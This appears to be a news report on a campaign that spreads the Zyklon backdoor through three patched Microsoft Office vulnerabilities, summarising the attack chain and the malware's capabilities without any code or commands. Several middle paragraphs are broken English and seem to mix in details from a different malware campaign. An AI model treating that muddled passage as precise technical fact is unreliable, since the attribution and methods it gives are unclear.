Criminals are delivering Zyklon malware using three vulnerabilities in Microsoft Office that were recently patched. Security researchers at FireEye reported that the malware campaign leveraging the relatively new Office exploits has been spotted in the wild, distributing an advanced malware that they called a full-featured backdoor.
The campaign exploits three recently disclosed vulnerabilities in Microsoft Office to execute a PowerShell script on the target system to eventually download the final payload. These vulnerabilities include:
CVE-2017-8759: works by tricking target into opening a specially crafted file.
CVE-2017-11882 (RCE vulnerability): 17-year-old memory corruption flaw patched in November that works when “upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object.”
Dynamic Data Exchange Protocol (DDE): “Dynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution,” researchers wrote. “With the help of a PowerShell script, the next payload is downloaded.
A Patched remote code execution Microsoft Office Vulnerability ( CVE-2017-11882) using it for spreading a variety of Malware such as FAREIT, Ursnif and a Keylogger Loki info stealer that is used for stealing Crypto wallet password.
In this case, some of the uncommon methods has been reused by helping of Windows Installer service Windows.
Previous Exploitation did use the Windows executable mshta.exe to run a Powershell script. but this attack using uses msiexec.exe Exploit this Vulnerability.
Various other methods such as Wscript, Powershell, Mshta.exe, Winword.exe is very common methods and security software are easily monitoring these methods if other malware is abusing these function.
Zyklon is a full-featured backdoor, first observed in the wild in early 2016, and offers a number of sophisticated capabilities to the attackers who primarily target telecommunications, insurance and financial services. The malware can do a number of things, including:
Downloading and executing additional plugins
Conducting distributed denial-of-service (DDoS) attacks
Self-updating and self-removal